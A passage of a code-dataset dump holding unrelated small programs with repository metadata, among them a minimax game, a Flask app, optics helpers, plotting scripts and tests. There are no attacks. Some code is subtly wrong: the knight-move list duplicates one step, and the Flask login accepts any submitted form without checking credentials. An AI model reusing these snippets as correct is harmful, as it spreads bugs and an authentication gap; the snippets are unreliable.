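A hedged variant of the `arg_rules` decorator above: it validates before calling the wrapped function (the original computes `res` first), checks the type before taking `len()`, and reports which required substrings are missing:

```python
# Sketch: validate first, call the wrapped function only if all rules pass.
from functools import wraps

def arg_rules(type_, max_length, contains):
    def deco(func):
        @wraps(func)
        def wrap(name):
            if not isinstance(name, type_):
                return f"Argument must be {type_.__name__}"
            if len(name) > max_length:
                return f"Argument cannot hold more than {max_length} chars"
            missing = [c for c in contains if c not in name]
            if missing:
                return f"Should contain: {', '.join(missing)}"
            return func(name)
        return wrap
    return deco

@arg_rules(type_=str, max_length=15, contains=["05", "@"])
def create_slogan(name):
    return f"{name} drinks pepsi in his brand new BMW!"

print(create_slogan("Clown205@"))   # passes all rules
```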
> 0):\n return 1\n if (self.board[0,0] < 0) and (self.board[1,1] < 0) and (self.board[2,2] < 0):\n return -1\n if (self.board[0,2] < 0) and (self.board[1,1] < 0) and (self.board[2,0] < 0):\n return -1\n return 0\n \n def get_legal_moves(self, player):\n legal_moves = []\n for i,row in enumerate(self.board):\n for j,square in enumerate(row):\n for size, n_marker in enumerate(self.markers[0 if player==1 else 1]):\n if n_marker <= 0:\n continue\n if np.abs(square) < (size+1):\n legal_moves += [(i, j, size+1, player)]\n if len(legal_moves) == 0:\n return [None]\n return legal_moves\n \n def do_move(self, move):\n self.moves += [move]\n self._do_move(move)\n\n def _do_move(self, move):\n i, j, size, player = move\n self.board[i,j] = size*player\n self.markers[0 if player==1 else 1][size-1] -= 1\n\n def undo_move(self):\n self.board = np.zeros((3,3))\n self.markers = [[2,2,2],[2,2,2]]\n self.moves = self.moves[:-1]\n for move in self.moves:\n self._do_move(move)\n \n def minimax(self, depth, maximizingPlayer, alpha, beta, none_counter=0):\n \n if self.check_winner() != 0:\n return self.check_winner()\n\n if none_counter > 1:\n return maximizingPlayer*20\n \n if maximizingPlayer:\n best = -10\n # Recur for left and right children\n for move in self.get_legal_moves(1):\n if move is not None:\n self.do_move(move)\n none_counter = 0\n else:\n none_counter += 1\n\n val = self.minimax(depth + 1, False, alpha, beta, none_counter)\n if move is not None:\n self.undo_move()\n best = max(best, val)\n alpha = max(alpha, best)\n \n # Alpha Beta Pruning\n if beta <= alpha:\n break\n return best\n \n else:\n best = 10\n # Recur for left and\n # right children\n for move in self.get_legal_moves(-1):\n if move is not None:\n self.do_move(move)\n none_counter = 0\n else:\n none_counter += 1\n val = self.minimax(depth + 1, True, alpha, beta, none_counter)\n if move is not None:\n self.undo_move()\n best = min(best, val)\n beta = min(beta, best)\n \n # Alpha Beta Pruning\n if beta <= alpha:\n break\n \n return best\n \n\nboard = Board()\n# print(board.get_legal_moves(1))\ntry:\n print(board.minimax(0, True, -10, 10))\nexcept:\n print(\"error\")\n\n\n","repo_name":"demolburgie/demolburgie.github.io","sub_path":"random/tic_tac_toe.py","file_name":"tic_tac_toe.py","file_ext":"py","file_size_in_byte":3665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22085866570","text":"import requests\nfrom urllib.parse import quote_plus\n\npayload = {\"init_headers\": \"\", \"tasks\": {\"task-1\": {\"task_type\": \"get_screenshot\", \"task_code\": \"\"}}}\nresponse = requests.post(\"http://0.0.0.0:5000/execute?url={url}&viewport=1280x720&timeout=180&method=get\"\n \"&load_images=0&token=iamlazydeveloper\".format(\n url=quote_plus(\"http://invana.io\")),\n data=payload)\nprint(response.status_code)\nprint(response.json())\n","repo_name":"invana/browser-engine","sub_path":"tests/test_restful.py","file_name":"test_restful.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"8195389888","text":"# Дельта-правило\n\n# Сеть училась распозновать 5ть на картинке\n# 1. В сеть подали 5 и она её узнала, значит дельта ошибки (=) равна 0 и соответствено ничего делать не нужно.\n# 2. В сеть подали 5, но она её не узнала и выдала друое значение, в этом случае мы прибавляем вес, который мы определили в скорости обучения = коэффициент\n# 3. 
В сеть подали, например 7, но она сказала что это 5ть, в этом случае мы вычитаем вес, который мы определили в скорости обучения = коэффициент. \n# 4. В сеть например, подали 7 и сеть прявильно определила, что это не 5ть, значит дельта ошибки (=) равна 0 и соответствено ничего делать не нужно.\n\nimport random\n# Коэффициент при Х\nk = random.uniform(-5, 5)\n\n# Свободный член урованения прямой - c\nc = random.uniform(-5, 5)\nprint('Начальная прямая линия: ', k, '* x + ', c)\n\nrate = 0.0001 # скорость обучения = значение на которое меняется вес связи в соответствии с дельта-правилом\n\n\n# Набор точек X:Y\ndata = {22: 150, 23: 155, 24: 160, 25: 162, 26: 171, 27: 174, 28: 180, 29: 183, 30: 189, 31: 192}\n\n\n# Расчёт Y\ndef proceed(x):\n return x * k + c\n\n# Тренеровка сети\nfor i in range (100000):\n # Получить случайную X-координату точки\n x = random.choice(list(data.keys()))\n # Получить соответствующую Y-координату точки\n true_result = data [x]\n # Получить ответ сети\n out = proceed(x)\n # Считаем ошибку сети\n delta = true_result - out\n # Меняем вес при x в соответствии с дельта-правилом\n k += delta * rate * x\n # Меняем вес при постоянном входе в соответствии с дельта-правилом\n c += delta * rate\n\n# Вывод данных начальной прямой линии\n\nprint('Готовая прямая: Y = ', k, '* x + ', c)\n\n\n\n\n\n\n\n","repo_name":"romanskrypka/AI","sub_path":"basic_py/ai_06.py","file_name":"ai_06.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9899251970","text":"'''Programs that simulates BBS \r\n Name: Othniel KONAN\r\n Student number: KNNOTH001\r\n Date: 2014/04/12'''\r\n\r\n#definition of global variable\r\nmessage = \"no message yet\"\r\ni = True \r\nfiles=['42.txt','1015.txt']\r\n\r\n#function to print the menu and to prompt the user\r\ndef menu():\r\n print('Welcome to UCT BBS\\nMENU')\r\n print('(E)nter a message\\n(V)iew message\\n(L)ist files\\n(D)isplay file\\ne(X)it\\nEnter your selection:')\r\n#function that return the lower-case of a string input \r\ndef prompt():\r\n choice = input()\r\n return choice.lower()\r\n\r\n#function that executes instructions according to the input of the user\r\ndef choice(ans):\r\n global message\r\n global i\r\n if ans == 'e':\r\n message = input('Enter the message:\\n')\r\n elif ans == 'v':\r\n print('The message is:',message)\r\n elif ans == 'l':\r\n print('List of files: ',files[0],', ',files[1],sep='') \r\n elif ans == 'd':\r\n file=input('Enter the filename:\\n')\r\n if file == '42.txt':\r\n print('The meaning of life is blah blah blah ...')\r\n elif file == '1015.txt':\r\n print('Computer Science class notes ... 
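The delta-rule loop above (its Russian comments walk through the four reward/penalty cases of the rule) should converge toward the ordinary least-squares line for this data, which NumPy computes in closed form; a quick cross-check:

```python
# Hedged cross-check: fit the same x/y points with np.polyfit and compare
# the slope/intercept against the delta-rule result.
import numpy as np

data = {22: 150, 23: 155, 24: 160, 25: 162, 26: 171,
        27: 174, 28: 180, 29: 183, 30: 189, 31: 192}
x = np.array(list(data.keys()), dtype=float)
y = np.array(list(data.values()), dtype=float)
k, c = np.polyfit(x, y, 1)   # highest degree first: slope, intercept
print(f"least squares: y = {k:.3f} * x + {c:.3f}")
```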
simplified\\nDo all work\\nPass course\\nBe happy')\r\n else:\r\n print('File not found')\r\n else:\r\n i = False\r\n\r\n#main function of the program \r\ndef main():\r\n global i\r\n while i:\r\n menu()\r\n ans = prompt()\r\n choice(ans)\r\n print('Goodbye!')\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_5/knnoth001/question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39117362155","text":"input_data=input()\nrow=int(input_data[1])\ncolumn=int(ord(input_data[0]))-int(ord('a'))+1 ##유니코드 오더 위치\n\n#나이트가 이동하는 8가지방향\nsteps = [(-2,-1),(-1,-2),(1,-2),(2,-1),(2,1),(1,2),(-1,-2),(-2,1)]\n\n#8방향 이동가능?\nresult=0\nfor step in steps:\n next_row=row+step[0]\n next_column=column+step[1]\n #되면 카운트 증가\n if 0 I:\n I = J\n subfamily = q\n q = parent\n sf_names = [t.name for t in subfamily.get_terminals()]\n families[\"Group\" + str(group)] = (sf_names, subfamily)\n already_grouped = already_grouped.union(set(sf_names))\n group += 1\n # Resolve families by keeping only the largest, i.e., if a subtree is contained within another, remove it\n remove_these = set()\n for family in families:\n f_tree = families[family][1]\n f_tree_size = len(families[family][0])\n for other_family in families:\n of_tree = families[other_family][1]\n of_tree_size = len(families[other_family][0])\n # If the current family subtree includes the `other' family tree, then we don't consider the\n # other family as an individual group and mark it for removal\n if f_tree.is_parent_of(of_tree) and of_tree_size < f_tree_size:\n remove_these.add(other_family)\n new_families = dict()\n cnt = 0\n for k, v in families.items():\n if k not in remove_these:\n new_name = \"Group%i\" % cnt\n #Remove [0] to assign a tuple, where [0] is the list of seq names and [1] is the clade object\n new_families[new_name] = v[0]\n cnt += 1\n self.sub_families = new_families\n return new_families\n\n def change_leaf_names_to_sequence(self, mapping):\n \"\"\"\n Change the leaf names to the actual sequence\n mapping should be a dictionary with [current_name : sequence] (sequence can also be whatever you want)\n \"\"\"\n leaves = self.tree.get_terminals()\n for leaf in leaves:\n leaf.name = mapping[leaf.name]\n\n def write_annotations(self, filename):\n \"\"\"\n Write an annotation file containing columns for name and the identified subgroup\n :param filename:\n :return:\n \"\"\"\n assert self.sub_families, \"Call 'find_sub_families' first\"\n with open(filename, 'w') as fh:\n print >> fh, \"Name\\tGroup\\tSequence\"\n for group, results in self.sub_families.items():\n for name in results:\n print >> fh, \"%s\\t%s\\t%s\" % (name, group, self.seqs_dict[name].sequence)\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"julianzaugg/PDProcessing","sub_path":"subgroup.py","file_name":"subgroup.py","file_ext":"py","file_size_in_byte":4704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41722204980","text":"from flask import render_template, url_for, flash, redirect, request\nfrom flaskblog.__innit__ import app, db, bcrypt\nfrom flaskblog.forms import RegistrationForm, LoginForm, IssueKeywordForm, GejalaForm\nfrom flaskblog.models import User, ContactHistory, Symptoms\nfrom flask_login import login_user, logout_user, current_user, login_required\nimport requests as req\nimport json\nimport 
os\nimport pickle\n\nfrom get_data import convert_tweets\n\n#MAIN LOGIN PAGE\n@app.route('/')\n@app.route('/home')\ndef home():\n return render_template('main_login.html', title = 'Home')\n\n#LOGIN PAGE\n@app.route(\"/login\", methods=['GET', 'POST'])\ndef login():\n form = LoginForm()\n #Validation for user\n #String validation\n if form.validate_on_submit():\n return redirect(url_for('main_page'))\n return render_template('login.html', title='Login', form=form)\n\n#MAIN PAGE\n@app.route('/main_page', methods = ['GET','POST'])\ndef main_page():\n form = IssueKeywordForm()\n #Save submitted file\n if form.validate_on_submit():\n query = request.form['query']\n fromdate = request.form['fromdate']\n todate = request.form['todate']\n result_dict = {'query':query, 'fromDate':fromdate, 'toDate':todate}\n #Convert to specified json format\n result_dict = convert_tweets(result_dict)\n result_dict = json.dumps(result_dict)\n #Save cookie and redirect to /show_result\n response = redirect(url_for('show_result'))\n response.set_cookie('YourSessionCookie', result_dict)\n return response\n\n return render_template('main_page.html', title = 'Cek resiko infeksi online', form = form)\n\n\n@app.route('/result', methods = ['POST'])\ndef result():\n\n #Jsonify body post\n json = request.get_json()\n return convert_tweets(json)\n\n\n@app.route('/show_result', methods = ['GET'])\ndef show_result():\n\n result = request.cookies.get('YourSessionCookie')\n result = json.loads(result)\n\n #print(os.getcwd())\n #with open('./flaskblog/static/dummy.pickle','rb') as f:\n # result = pickle.load(f)\n \n\n return render_template('result_page.html', title = 'Halaman Hasil', result=result)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n@app.route('/profile')\n@login_required\ndef profile():\n post = ContactHistory.query.all()\n return render_template('profile.html', title = ' Profil', posts=post)\n\n\n\n@app.route('/logout')\ndef logout():\n logout_user()\n return redirect(url_for('home'))","repo_name":"farhanhanavi/DCC_SMM_MVP","sub_path":"flaskblog/route.py","file_name":"route.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73256733881","text":"def solution(N):\n factorCount = 0\n factors = []\n i = 1\n \n while i*i < N:\n \n if N%i == 0:\n factors.append((i,N//i))\n \n \n i+=1\n\n if i*i == N:\n factors.append((i,N//i))\n\n minPerameter = float(\"inf\")\n\n for pairs in factors:\n currentParameter = 2*(pairs[0]+pairs[1])\n minPerameter = min(minPerameter,currentParameter)\n\n\n return minPerameter\n\nprint(solution(30)) \n ","repo_name":"ankitbrahmbhatt1997/Python-Datastructures-and-ALgorithms","sub_path":"codility/Prime/question.py","file_name":"question.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40877754800","text":"from math import isnan\n\nfrom pure_ta import Quote, ta\n\n# Expected results.\n# https://docs.google.com/spreadsheets/d/1n3-bYh1V0JMStMBIJKE6CSJCLMMEP19tD7vGkRrtq6I/edit?usp=sharing.\n\n\ndef test_wma_returns_correct_number_of_results(get_default: list[Quote]):\n \"\"\"Sma results should have the correct length.\"\"\"\n wma = ta.wma()\n results = [wma(q.close) for q in get_default]\n assert len(results) == 502\n\n\ndef test_wma_returns_correct_number_of_results_without_nan(get_default: list[Quote]):\n \"\"\"Wma results should have the correct number of results without NaN.\"\"\"\n wma = 
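For readers without the `pure_ta` package, a minimal reference implementation of the closure-style WMA the tests below exercise (weights 1..n with the newest bar weighted most, NaN until the window fills); this is a sketch, not the library's actual code:

```python
# Hedged reference WMA: make_wma(n) returns a callable fed one value per bar,
# mirroring the `wma = ta.wma(length); wma(q.close)` usage in the tests.
from collections import deque

def make_wma(length):
    window = deque(maxlen=length)
    denom = length * (length + 1) / 2          # sum of weights 1..length
    def wma(value):
        window.append(value)
        if len(window) < length:
            return float("nan")                # warm-up period
        return sum(w * v for w, v in enumerate(window, start=1)) / denom
    return wma

wma3 = make_wma(3)
print([wma3(v) for v in (1, 2, 3, 4)])  # [nan, nan, 2.33..., 3.33...]
```

With `length=20` over 502 quotes this yields 483 non-NaN values, matching the test expectations.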
ta.wma(length=20)\n results = [wma(q.close) for q in get_default]\n non_nan_results = [r for r in results if not isnan(r)]\n assert len(non_nan_results) == 483\n\n\ndef test_wma_returns_correct_calculation_results(get_default: list[Quote]):\n \"\"\"Wma results should be accurate.\"\"\"\n wma = ta.wma(length=20)\n results = [wma(q.close) for q in get_default]\n result149 = results[149]\n result501 = results[501]\n\n # toPrecision(4) in Dart equals round with 3 decimal places in Python\n assert round(result149, 4) == 235.5253\n assert round(result501, 3) == 246.511\n","repo_name":"Takin-Profit/pure_ta","sub_path":"tests/test_wma.py","file_name":"test_wma.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12188764828","text":"\nimport scipy.constants as codata\nimport numpy\n\n\n\nm2ev = codata.c * codata.h / codata.e # lambda(m) = m2eV / energy(eV)\n\n\n# # used by Luca\n# codata_h = numpy.array(6.62606957e-34)\n# codata_ec = numpy.array(1.602176565e-19)\n# codata_c = numpy.array(299792458.0)\n# m2ev = codata_c * codata_h / codata_ec # lambda(m) = m2eV / energy(eV)\n\ndef solve_grating_equation(line_density=100000,wavelength=10e-10,c=1.10,order=1,method='beta'):\n\n if method == 'beta': # beta!!\n\n A = (1.0 - 1.0 / c ** 2)\n B = -2 * order * line_density * wavelength\n C = order ** 2 * line_density ** 2 * wavelength ** 2 - 1 + 1.0 / c ** 2\n\n Delta = B ** 2 - 4 * A * C\n\n sinbeta1 = (-B + numpy.sqrt(Delta)) / 2 / A\n sinbeta2 = (-B - numpy.sqrt(Delta)) / 2 / A\n\n # print(\"Discriminant=%f, sinbeta1=%f, sinbeta2=%f\" % (Delta, sinbeta1, sinbeta2))\n\n if numpy.abs(sinbeta1) <= 1:\n sinbeta = sinbeta1\n elif numpy.abs(sinbeta2) <= 1:\n sinbeta = sinbeta2\n else:\n raise Exception(\"No valid beta angle\")\n\n # change sign of beta\n # sinbeta *= -1\n\n # beta = numpy.arcsin(sinbeta)\n\n sinalpha = order * wavelength * line_density - sinbeta\n\n # alpha = numpy.arcsin(sinalpha)\n\n else: # alpha\n A = (1.0 - order ** 2)\n B = -2 * order * line_density * wavelength\n C = order ** 2 * line_density ** 2 * wavelength ** 2 - 1 + c ** 2\n\n Delta = B ** 2 - 4 * A * C\n\n sinalpha1 = (-B + numpy.sqrt(Delta)) / 2 / A\n sinalpha2 = (-B - numpy.sqrt(Delta)) / 2 / A\n\n # print(\"Discriminant=%f, sinalpha1=%f, sinalpha2=%f\" % (Delta, sinalpha1, sinalpha2))\n\n if numpy.abs(sinalpha1) <= 1:\n sinalpha = sinalpha1\n elif numpy.abs(sinalpha2) <= 1:\n sinalpha = sinalpha2\n else:\n raise Exception(\"No valid alpha angle\")\n\n # # my value\n # sinalpha_me = m*lambda0*k0/(1-c**2) + numpy.sqrt( (m*lambda0*k0/(1-c**2))**2 - \\\n # ( (m * lambda0 * k0 / (1-c**2))**2 -1) )\n #\n # # Luca\n # sinalpha_luca = (-m * k0 * lambda0 / (c ** 2 - 1)) + \\\n # numpy.sqrt(1 + (m * m * c * c * k0 * k0 * lambda0 * lambda0) / (\n # (c ** 2 - 1) ** 2))\n #\n # print(\"sin_alpha numeric, me, luca: \",sinalpha,sinalpha_me,sinalpha_luca)\n\n # change sign of beta\n # sinbeta *= -1\n\n # alpha = numpy.arcsin(sinalpha)\n\n sinbeta = order * wavelength * line_density - sinalpha\n\n # beta = numpy.arcsin(sinbeta)\n\n return sinalpha,sinbeta\n\ndef vls_coefficients_calculate(sinalpha, sinbeta, rg, rgp, line_density=1000, wavelength=10e-10, order=1):\n\n #\n # calculate grating coefficients:\n #\n\n denominator = 2.0 * order * wavelength * line_density\n\n # VLS ShadowOui preprocessor\n # self.b2 = (((numpy.cos(alpha) ** 2) / self.r_a) + ((numpy.cos(beta) ** 2) / self.r_b)) / (\n # -2 * m * self.k * wavelength)\n # self.b3 = 
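A quick cross-check of `solve_grating_equation` below: its 'beta' branch solves the quadratic A sin²β + B sinβ + C = 0 and keeps the root with |sinβ| ≤ 1. The same roots can be obtained with `numpy.roots`, using the function's default arguments:

```python
# Hedged sanity check of the quadratic set up in solve_grating_equation.
import numpy as np

k0, lam, c, m = 100000, 10e-10, 1.10, 1   # the function's default arguments
A = 1.0 - 1.0 / c**2
B = -2 * m * k0 * lam
C = (m * k0 * lam) ** 2 - 1 + 1.0 / c**2
roots = np.roots([A, B, C])
sinbeta = roots[np.abs(roots) <= 1][0]    # the physical root, as above
sinalpha = m * k0 * lam - sinbeta         # grating equation
assert abs(A * sinbeta**2 + B * sinbeta + C) < 1e-9
assert abs(sinalpha) <= 1
print(sinalpha, sinbeta)
```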
((numpy.sin(alpha) * numpy.cos(alpha) ** 2) / self.r_a ** 2 - \\\n # (numpy.sin(beta) * numpy.cos(beta) ** 2) / self.r_b ** 2) / (-2 * m * self.k * wavelength)\n # self.b4 = (((4 * numpy.sin(alpha) ** 2 - numpy.cos(alpha) ** 2) * numpy.cos(alpha) ** 2) / self.r_a ** 3 + \\\n # ((4 * numpy.sin(beta) ** 2 - numpy.cos(beta) ** 2) * numpy.cos(beta) ** 2) / self.r_b ** 3) / (\n # -8 * m * self.k * wavelength)\n\n\n b2 = ( (1-sinalpha**2)/rg + (1-sinbeta**2)/rgp) / denominator\n b3 = ( sinalpha*(1-sinalpha**2)/rg**2 + sinbeta*(1-sinbeta**2)/rgp**2) / denominator\n b4 = (((4 * sinalpha ** 2 - (1-sinalpha**2)) * (1-sinalpha**2)) / rg ** 3 + \\\n ((4 * sinbeta ** 2 - (1-sinbeta**2)) * (1-sinbeta**2)) / rgp ** 3) / \\\n (4 * denominator )\n\n # print(\" b2=%f\\n b3=%f\\n b4=%f\\n\"%(b2,b3,b4))\n # print(\"Shadow coefficients:\\n c1=%f\\n c2=%f\\n c3=%f\\n\"%(k0,2*b2*k0,-3*b3*k0))\n # shadow_coefficients = (k0, 2 * b2 * k0, -3 * b3 * k0, 4 * b4 * k0)\n # print(\"Shadow coefficients:\\n c1=%f\\n c2=%f\\n c3=%f\\n c4=%f\\n\" % shadow_coefficients)\n\n return b2,b3,b4\n\ndef vls_coefficients_convert_to_shadow(k0,b2,b3,b4):\n return k0, 2 * b2 * k0, -3 * b3 * k0, 4 * b4 * k0\n\ndef trajectories(energies,r,rp,k0,m,b2,verbose=False):\n\n # if energies is an scalar\n if isinstance(energies,float):\n energies = numpy.array([energies])\n\n Alpha = energies * 0\n Beta = energies * 0\n\n\n for i,energy in enumerate(energies):\n #\n # get alpha and beta for any energy\n #\n\n wavelength = m2ev / energy # numpy.sqrt(Emin*Emax)\n\n A = -(1.0/r + 1.0/rp)\n B = 2 * wavelength * k0 / rp\n C = -A - (wavelength * k0)**2 / rp - 2 * m * wavelength * k0 * b2\n\n Delta = B * B - 4 * A * C\n\n if verbose:\n print(\"Second degree equation:\\n A=%f,B=%f,C=%f,Discriminant=%f\"%(A,B,C,Delta))\n\n x1 = (-B + numpy.sqrt(Delta)) / 2 / A\n x2 = (-B - numpy.sqrt(Delta)) / 2 / A\n\n if verbose:\n print(\" Solutions: x1=%f, x2=%f\"%(x1,x2))\n\n\n # print(\"A,B,C,Delta: \",A,B,C,Delta)\n # print(\"x1,x2=\",x1,x2)\n alpha1 = numpy.arcsin(x1)\n alpha2 = numpy.arcsin(x2)\n if alpha1 > 0:\n alpha = alpha1\n else:\n alpha = alpha2\n\n sinbeta1 = (wavelength * k0) - numpy.sin(alpha)\n beta = numpy.arcsin(sinbeta1)\n\n Alpha[i] = alpha\n Beta[i] = beta\n\n # print(\"alpha,beta = \",alpha*180/numpy.pi,beta*180/numpy.pi)\n return Alpha,Beta","repo_name":"srio/shadow3-scripts","sub_path":"ALS/grating_tools.py","file_name":"grating_tools.py","file_ext":"py","file_size_in_byte":5621,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"10376686619","text":"from matplotlib import pyplot as plt\nimport numpy as np\nfrom math import *\nfrom mpl_toolkits.mplot3d.art3d import Poly3DCollection, Line3DCollection\n\n\nfig = plt.figure()\n\n\nx=np.zeros(1)\ny=np.zeros(1)\nr=1 #радиус гексагона\nn=3 #количество точек на стороне\nh=r*sqrt(3)/2 #высота гексогона\nd=4 #длинна сетки\ns=6 #расстояние по x\n\n\n\ndef hexagon(x,y):\n #создание верхней пол��сы\n for i in range(n):\n x=np.append(x, -r/2+r*i/n)\n y=np.append(y, h)\n #поворот полосы \n for i in range(5*n):\n l=len(x)-n\n x=np.append(x, x[l]*cos(-pi/3)-y[l]*sin(-pi/3))\n y=np.append(y, x[l]*sin(-pi/3)+y[l]*cos(-pi/3))\n \n return x,y\n\ndef mesh(x,y,d):\n #создание высоких колонн\n for a in range(1,d,2):\n for b in range(-1,d+2,2):\n for op in range(n*6):\n x=np.append(x, a*1.5*r+x[n*6-op])\n y=np.append(y, b*h+y[n*6-op])\n #создание низких колонн\n for a in range(-1,d,2):\n for b in range(-1,d+2,2):\n for op in range(n*6):\n x=np.append(x, 
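A performance aside on the `hexagon`/`mesh` builders below: `np.append` copies the whole array on every call, so growing the mesh point-by-point is quadratic. The usual idiom is to accumulate in Python lists and convert once; a sketch of the hexagon boundary built that way:

```python
# Hedged sketch: build all points in lists, convert to an array at the end.
import numpy as np
from math import cos, sin, pi, sqrt

r, n = 1.0, 3
pts = [(-r / 2 + r * i / n, r * sqrt(3) / 2) for i in range(n)]  # top edge
for _ in range(5):                 # rotate the last edge around the hexagon
    last = pts[-n:]
    pts += [(x * cos(-pi / 3) - y * sin(-pi / 3),
             x * sin(-pi / 3) + y * cos(-pi / 3)) for x, y in last]
x, y = np.array(pts).T
print(len(x))   # 18 boundary points, as in the loop-based version
```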
a*1.5*r+x[n*6-op]+1.5*r)\n y=np.append(y, b*h+y[n*6-op]+h)\n return x,y\n\ndef delpoint(x,y):\n x = np.delete(x, 0, axis=0)\n y = np.delete(y, 0, axis=0)\n x=np.round(x,3)\n y=np.round(y,3)\n print(len(x),len(y))\n i=0\n while(i=0 and q0[i][1]<=sqrt(3)*q0[i][0]+0.01 and q0[i][1]<=-sqrt(3)*q0[i][0]+s*sqrt(3)+0.01:\n q=np.append(q,[q0[i]], axis = 0)\n\n\n#сам массив из шестиугольников обрезанный по нужной форме\nmas=np.zeros((0,3))\n\nm=q\n#собственно сами повороты указано вокруг каких осей\n#чтобы получилась 1 нижняя грань\nm=pov_z(m,60)\nm=pov_x(m,55)\n\nh=max(m[:,2])\n\n#копирование одной гнани на три стороны\nmas=np.append(mas,m, axis = 0)\nmas=np.append(mas,pov_z(m,90), axis = 0)\nmas=np.append(mas,pov_z(m,180), axis = 0)\nmas=np.append(mas,pov_z(m,270), axis = 0)\n\n#создание верхней грани\nm=q\nm=pov_z(m,60)\nm=pov_x(m,-55)\n\n#подъем этой грани наверх\nfor i in range(len(m)):\n m[i,2]+=2*h\n#копировние на все строны\nmas=np.append(mas,m, axis = 0)\nmas=np.append(mas,pov_z(m,90), axis = 0)\nmas=np.append(mas,pov_z(m,180), axis = 0)\nmas=np.append(mas,pov_z(m,270), axis = 0)\n \nax.scatter(mas[:,0],mas[:,1],mas[:,2])\nax.axes.set_xlim(-5,5)\nax.axes.set_ylim(-5,5)\nplt.show()","repo_name":"NikEgil/virus-octahedron-and-icosahedron","sub_path":"октаэдр с гексагонами.py","file_name":"октаэдр с гексагонами.py","file_ext":"py","file_size_in_byte":4325,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24529626725","text":"from base64 import b64decode, b64encode\nfrom onegov.core.custom import json\nfrom onegov.form.display import registry, BaseRenderer\nfrom onegov.gis.forms.widgets import CoordinatesWidget\nfrom onegov.gis.models import Coordinates\nfrom wtforms.fields import StringField\n\n\nclass CoordinatesField(StringField):\n \"\"\" Represents a single pair of coordinates with optional zoom and\n marker icon/color selection.\n\n In the browser and during transit the point is stored as a base64 encoded\n json string on a simple input field. For example::\n\n eydsYXQnOiA4LjMwNTc2ODY5MTczODc5LCAnbG.. 
(and so on)\n\n =>\n\n {'lon': 8.30576869173879, 'lat': 47.05183585, 'zoom': 10}\n\n For verification: This points to the Seantis office in Lucerne.\n\n For convenience, the coordinates are accessible with the\n :class:`onegov.gis.models.coordinates.Coordinates` class when 'data' is\n used.\n\n Note that this field doesn't work with the ``InputRequired`` validator.\n Instead the ``DataRequired`` validator has to be chosen.\n\n \"\"\"\n\n widget = CoordinatesWidget()\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.data = getattr(self, 'data', Coordinates())\n\n def _value(self):\n text = json.dumps(self.data) or '{}'\n text = b64encode(text.encode('ascii'))\n text = text.decode('ascii')\n\n return text\n\n def process_data(self, value):\n if isinstance(value, dict):\n self.data = Coordinates(**value)\n else:\n self.data = value\n\n def populate_obj(self, obj, name):\n setattr(obj, name, self.data)\n\n def process_formdata(self, valuelist):\n if valuelist and valuelist[0]:\n text = b64decode(valuelist[0])\n text = text.decode('ascii')\n self.data = json.loads(text)\n else:\n self.data = Coordinates()\n\n # if the data we receive doesn't result in a coordinates value\n # for some reason, we create one\n if not isinstance(self.data, Coordinates):\n self.data = Coordinates()\n\n\n@registry.register_for('CoordinatesField')\nclass CoordinatesFieldRenderer(BaseRenderer):\n def __call__(self, field):\n return \"\"\"\n
            {lat}, {lon} (zoom: {zoom})\n
    \n \"\"\".format(\n lat=field.data.lat,\n lon=field.data.lon,\n zoom=field.data.zoom\n )\n","repo_name":"OneGov/onegov.gis","sub_path":"onegov/gis/forms/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"5544879097","text":"# !/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\n @ Time : 2019/02/20 08:22\r\n @ Author : Vodka\r\n @ File : linear_svm.py\r\n @ Software : PyCharm\r\n\"\"\"\r\nimport pandas as pd\r\nimport sklearn.svm\r\nimport scipy.io as sio\r\nimport matplotlib.pyplot as plt\r\n\r\nif __name__ == '__main__':\r\n # 加载数据\r\n mat = sio.loadmat('ex6data1.mat')\r\n print(mat)\r\n data = pd.DataFrame(mat.get('X'), columns=['X1', 'X2'])\r\n data['y'] = mat.get('y')\r\n print(data)\r\n\r\n # 画图\r\n positive = data[data['y'].isin([1])]\r\n negative = data[data['y'].isin([0])]\r\n fig, ax = plt.subplots()\r\n ax.scatter(positive['X1'], positive['X2'], s=50, marker='x', label='Positive')\r\n ax.scatter(negative['X1'], negative['X2'], s=50, marker='o', label='Negative')\r\n ax.legend()\r\n plt.show()\r\n\r\n # 定义SVM\r\n # C = 1\r\n svc1 = sklearn.svm.LinearSVC(C=1, loss='hinge')\r\n svc1.fit(data[['X1', 'X2']], data['y'])\r\n print(svc1.score(data[['X1', 'X2']], data['y']))\r\n data['SVM1 Confidence'] = svc1.decision_function(data[['X1', 'X2']])\r\n # C = 100\r\n svc100 = sklearn.svm.LinearSVC(C=100, loss='hinge')\r\n svc100.fit(data[['X1', 'X2']], data['y'])\r\n print(svc100.score(data[['X1', 'X2']], data['y']))\r\n data['SVM100 Confidence'] = svc100.decision_function(data[['X1', 'X2']])\r\n\r\n # 渐变色画图看置信度\r\n 